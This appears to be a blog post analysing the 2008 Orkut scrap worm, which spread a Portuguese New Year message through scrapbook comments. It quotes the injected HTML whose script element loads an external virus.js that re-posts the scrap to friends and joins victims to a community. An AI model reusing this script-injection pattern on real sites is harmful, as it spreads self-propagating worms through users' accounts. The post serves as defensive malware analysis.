Orkut spam worm spotted!

I analyzed some suspicious scrap “2008 vem ai… que ele comece mto bem para vc” from a bunch of friends on Orkut. For a while it was all over Orkut!! Translated to English, it reads “2008 is coming…I wish that it begins quite well for you”.

The HTML source of the scrapbook gives:

script type=”text/javascript” var flashWriter = new _SWFObject(‘http://www.orkut.com/LoL.aspx’, ’408030725′, ’1′, ’1′, ’9′, ‘#FFFFFF’,
‘autohigh’, ”, ”, ’408030725′);
flashWriter._addParam(‘wmode’, ‘transparent’);
script=document.createElement(‘script’);
script.src=’http://files.[REMOVED].com/virusdoorkut/files/virus.js’;
document.getElementsByTagName(‘head’)[0].appendChild(script);
escape(”); flashWriter._addParam(‘allowNetworking’, ‘internal’);
flashWriter._addParam(‘allowScriptAccess’, ‘never’);
flashWriter._setAttribute(‘style’, ”);
flashWriter._write(‘flashDiv408030725′);
/script

When an Orkut user receives this malicious scrap, the browser downloads and executes the embedded virus.js script. It seems to do at least 2 things (it’s obfuscated and compacted, and I am writing this without any detailed analysis of the script so far) – scrap your friends with the same virulent message, and add your account to an Orkut community “Infectados pelo Vírus do Orkut” (“Infected by Orkut Virus” in English) created by the script author:

http://www.orkut.com/Community.aspx?cmm=44001818

A more detailed review of W32/KutWormer can be found in the Avert Labs Threat Library here.

As of the time of this writing, it had about 400,000 members (victims of this spam-worm). Apart from this, the worm doesn’t seem to affect your machine in any way. As I am writing this blog, I have seen the scraps disappearing so it looks like Orkut/Google are fighting back.

This clearly illustrates the issue with allowing rich-content on social/professional networking sites, and not sanitizing it enough. The ability to add Flash/Javascript content to Orkut scraps was only recently introduced.